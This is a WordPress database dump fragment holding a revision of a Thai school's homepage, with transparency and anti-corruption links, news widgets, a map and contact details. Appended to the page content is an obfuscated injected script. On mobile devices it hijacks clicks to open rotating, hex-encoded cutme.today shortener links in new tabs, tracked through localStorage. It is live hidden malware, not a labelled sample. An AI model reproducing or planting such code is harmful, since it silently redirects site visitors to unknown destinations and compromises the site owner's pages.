900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 17:24:15','2024-08-07 10:24:15','',14,'http://pakhaeng.ssk.in.th/?p=659',0,'revision','',0),
(660,1,'2024-08-07 21:32:39','2024-08-07 14:32:39','','ปขก1','','inherit','','closed','','%e0%b8%9b%e0%b8%82%e0%b8%811','','','2024-08-07 21:32:39','2024-08-07 14:32:39','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก1-1.png',0,'attachment','image/png',0),
